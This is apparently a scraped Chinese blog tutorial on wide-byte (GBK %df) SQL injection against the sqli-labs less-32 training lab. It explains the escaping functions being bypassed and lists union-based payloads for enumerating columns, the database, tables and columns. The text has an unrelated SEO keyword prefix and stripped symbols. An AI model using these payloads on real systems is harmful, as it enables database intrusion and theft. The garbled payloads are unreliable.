棋牌游戏网站建设,建设网站素材,网页设计岗位职责,网站图片怎样做seo优化文章目录 SQL注入 - 宽字节注入宽字节注入前置知识宽字节靶场实战判断是否存在SQL注入判断位数判显错位判库名判表名判列名 SQL注入 - 宽字节注入
靶场 sqli - labs less-32 宽字节注入主要是绕过魔术引号的#xff0c;数据库解析中除了UTF-8编码外的所有编码如#xff1a;G… 文章目录 SQL注入 - 宽字节注入宽字节注入前置知识宽字节靶场实战判断是否存在SQL注入判断位数判显错位判库名判表名判列名 SQL注入 - 宽字节注入
靶场 sqli - labs less-32 宽字节注入主要是绕过魔术引号的数据库解析中除了UTF-8编码外的所有编码如GBK等都有可能存在宽字节注入 宽字节注入前置知识 php 5.4 以下低版本修改配置文件然后强制执行使用 magic_quotes_gpc 函数转义 ?php
$a select * from admin where id $_REQUEST[8];
echo $a;
?php 5.4 以上高版本删除掉了这个配置通过特定函数使用addslashes() 函数转义 ?php
$b addslashes($_REQUEST[8]);
$a select * from admin where id $b;
echo $a;
?SQL注入的核心是 闭合引号注释后面的引号让我们的输入跳出单双引号 select * from users where id1 魔术引号的核心意义是不让你闭合通过反斜杠转义你输入的单双引号反斜杠等 绕过方法
1、寻找不需要闭合的地方如传参类型为init还是varchar
2、仔细查看作用域$_server
3、宽字节注入宽字节 两个单字节可以变为双字节如 select * from users where id1?/如数据库采用gbk编码方式?/ 被解释成汉字则 会被逃逸出来靶场实战
判断是否存在SQL注入 ?id1’ and 11 ?id1’ and 12 发现被反斜杠转义了 ?id1 and 11 --
?id1 and 12 --使用%df 进行宽字节注入绕过发现存在SQL注入 / 5c
%df df
df5c 運 (GBK编码字符)?id1%df and 11 --
?id1%df and 12 --判断位数 order by 语句可得 位数为3 ?id1%df order by 4 --判显错位 判断可得23 ?id-1%df union select 1,2,3 --判库名 判断可得 security ?id-1%df union select 1,2,database() --判表名
?id-1%df union select 1,2,table_name from information_schema.tables where table_schemadatabase() limit 0,1 --判列名
?id-1%df union select 1,2,column_name from information_schema.columns where table_schemadatabase() and table_name0x7573657273 limit 0,1 --0x7573657273(16进制) users